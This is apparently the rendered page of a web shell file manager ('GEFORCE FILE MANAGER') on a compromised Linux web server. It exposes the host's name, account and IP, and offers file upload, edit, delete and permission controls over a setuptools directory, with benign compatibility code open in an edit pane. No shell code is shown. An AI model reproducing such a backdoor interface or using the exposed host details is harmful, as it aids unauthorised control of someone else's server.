[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib
/
python3.6
/
site-packages
/
setuptools
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 __pycache__
SET
[ DEL ]
📁 _vendor
SET
[ DEL ]
📁 command
SET
[ DEL ]
📁 extern
SET
[ DEL ]
📄 __init__.py
5,700 B
SET
[ EDIT ]
|
[ DEL ]
📄 archive_util.py
6,592 B
SET
[ EDIT ]
|
[ DEL ]
📄 build_meta.py
5,671 B
SET
[ EDIT ]
|
[ DEL ]
📄 config.py
18,006 B
SET
[ EDIT ]
|
[ DEL ]
📄 dep_util.py
935 B
SET
[ EDIT ]
|
[ DEL ]
📄 depends.py
5,837 B
SET
[ EDIT ]
|
[ DEL ]
📄 dist.py
42,613 B
SET
[ EDIT ]
|
[ DEL ]
📄 extension.py
1,729 B
SET
[ EDIT ]
|
[ DEL ]
📄 glibc.py
3,146 B
SET
[ EDIT ]
|
[ DEL ]
📄 glob.py
5,207 B
SET
[ EDIT ]
|
[ DEL ]
📄 launch.py
787 B
SET
[ EDIT ]
|
[ DEL ]
📄 lib2to3_ex.py
2,013 B
SET
[ EDIT ]
|
[ DEL ]
📄 monkey.py
5,261 B
SET
[ EDIT ]
|
[ DEL ]
📄 msvc.py
40,877 B
SET
[ EDIT ]
|
[ DEL ]
📄 namespaces.py
3,199 B
SET
[ EDIT ]
|
[ DEL ]
📄 package_index.py
40,320 B
SET
[ EDIT ]
|
[ DEL ]
📄 pep425tags.py
10,873 B
SET
[ EDIT ]
|
[ DEL ]
📄 py27compat.py
536 B
SET
[ EDIT ]
|
[ DEL ]
📄 py31compat.py
1,192 B
SET
[ EDIT ]
|
[ DEL ]
📄 py33compat.py
1,182 B
SET
[ EDIT ]
|
[ DEL ]
📄 py36compat.py
2,891 B
SET
[ EDIT ]
|
[ DEL ]
📄 sandbox.py
14,276 B
SET
[ EDIT ]
|
[ DEL ]
📄 script (dev).tmpl
201 B
SET
[ EDIT ]
|
[ DEL ]
📄 script.tmpl
138 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-patch.py
2,307 B
SET
[ EDIT ]
|
[ DEL ]
📄 ssl_support.py
8,492 B
SET
[ EDIT ]
|
[ DEL ]
📄 unicode_utils.py
996 B
SET
[ EDIT ]
|
[ DEL ]
📄 version.py
144 B
SET
[ EDIT ]
|
[ DEL ]
📄 wheel.py
7,778 B
SET
[ EDIT ]
|
[ DEL ]
📄 windows_support.py
714 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: py31compat.py
__all__ = ['get_config_vars', 'get_path'] try: # Python 2.7 or >=3.2 from sysconfig import get_config_vars, get_path except ImportError: from distutils.sysconfig import get_config_vars, get_python_lib def get_path(name): if name not in ('platlib', 'purelib'): raise ValueError("Name must be purelib or platlib") return get_python_lib(name == 'platlib') try: # Python >=3.2 from tempfile import TemporaryDirectory except ImportError: import shutil import tempfile class TemporaryDirectory(object): """ Very simple temporary directory context manager. Will try to delete afterward, but will also ignore OS and similar errors on deletion. """ def __init__(self): self.name = None # Handle mkdtemp raising an exception self.name = tempfile.mkdtemp() def __enter__(self): return self.name def __exit__(self, exctype, excvalue, exctrace): try: shutil.rmtree(self.name, True) except OSError: # removal errors are not the only possible pass self.name = None